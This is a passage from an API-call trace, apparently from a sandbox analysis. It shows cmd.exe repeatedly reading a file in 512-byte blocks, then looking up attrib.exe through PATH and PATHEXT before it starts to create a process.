lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.896] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.896] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.896] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, 
lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.896] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.896] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.896] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.896] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.896] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.896] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.897] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.897] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.897] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: 
lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.897] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.897] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.897] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.897] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.897] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.897] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.897] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.898] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.898] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, 
lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.898] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.898] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.898] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.898] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.898] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.898] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.898] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.898] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.898] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.898] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.898] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.898] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.899] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.899] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.899] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.899] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.902] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.902] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.902] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.902] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.902] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.902] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.902] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.902] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.902] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.902] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.903] ReadFile (in: hFile=0x58, 
lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.903] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.903] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.903] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.903] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.903] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.903] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.903] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.903] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.903] ReadFile 
(in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.903] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.903] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.904] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.904] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.904] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.904] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.904] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.904] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 
[0136.904] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.904] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.904] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.904] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.904] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.904] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.905] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.905] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.905] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, 
lpOverlapped=0x0) returned 1 [0136.905] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.905] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.905] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.905] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.905] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.905] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.905] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.905] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.905] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, 
lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.906] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.906] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.906] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.906] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.906] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.906] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.906] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.929] _close (_FileHandle=4) returned 0 [0136.929] FindNextFileW (in: hFindFile=0x3d1488, lpFindFileData=0x2af068 | out: lpFindFileData=0x2af068) returned 0 [0136.930] GetLastError () returned 0x12 [0136.930] FindClose (in: hFindFile=0x3d1488 | out: hFindFile=0x3d1488) returned 1 [0136.930] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0136.932] 
_close (_FileHandle=3) returned 0 [0136.932] GetConsoleTitleW (in: lpConsoleTitle=0x2af4a0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.932] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0136.932] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0136.933] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0136.933] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2aed3c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aed3c) returned 0xffffffff [0136.933] GetLastError () returned 0x2 [0136.933] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x2aed3c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aed3c) returned 0xffffffff [0136.933] GetLastError () returned 0x2 [0136.933] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2aed3c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aed3c) returned 0x3d1488 [0136.933] FindClose (in: hFindFile=0x3d1488 | out: hFindFile=0x3d1488) returned 1 [0136.933] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x2aed3c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aed3c) returned 0xffffffff [0136.933] GetLastError () returned 0x2 [0136.933] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x2aed3c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: 
lpFindFileData=0x2aed3c) returned 0x3d1488 [0136.933] FindClose (in: hFindFile=0x3d1488 | out: hFindFile=0x3d1488) returned 1 [0136.934] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0136.934] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0136.934] GetConsoleTitleW (in: lpConsoleTitle=0x2af234, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.934] InitializeProcThreadAttributeList (in: lpAttributeList=0x2af0bc, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2af184 | out: lpAttributeList=0x2af0bc, lpSize=0x2af184) returned 1 [0136.934] UpdateProcThreadAttribute (in: lpAttributeList=0x2af0bc, dwFlags=0x0, Attribute=0x60001, lpValue=0x2af17c, cbSize=0x4, lpPreviousValue=0x0, 